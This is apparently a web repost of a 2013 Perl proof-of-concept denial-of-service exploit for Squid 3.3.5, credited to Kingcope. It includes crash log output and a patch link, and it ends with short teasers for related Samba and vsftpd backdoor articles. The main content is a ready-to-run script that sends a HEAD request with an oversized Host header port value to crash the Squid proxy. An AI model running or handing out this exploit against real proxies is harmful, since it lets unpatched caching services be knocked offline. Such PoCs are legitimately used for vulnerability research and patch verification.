Squid-3.3.5 DoS PoC

简介: #Squid Crash PoC#Copyright (C) Kingcope 2013#tested against squid-3.
#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries.
#2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
# total space in arena: 4100 KB
# Ordinary blocks: 4046 KB 7 blks
# Small blocks: 0 KB 0 blks
# Holding blocks: 564 KB 2 blks
# Free Small blocks: 0 KB
# Free Ordinary blocks: 53 KB
# Total in use: 4610 KB 112%
# Total free: 53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for i686-pc-linux-gnu...
#2013/07/15 20:48:39 kid1| Process ID 2990

use IO::Socket;

my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146',
PeerPort => '3128',
Proto => 'tcp');
$a = "yc" x 2000;
print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n";
while(<$sock>) {
print;
} 


目录
相关文章
|
安全 Shell
Samba MS-RPC Shell命令注入漏洞
靶场环境:metasploitable2 靶机地址:192.168.0.109 攻击机地址:192.168.0.114 首先打开kali,启动msf框架
185 0
Samba MS-RPC Shell命令注入漏洞
|
安全 Shell 数据安全/隐私保护
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
346 0
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
|
Linux Python Shell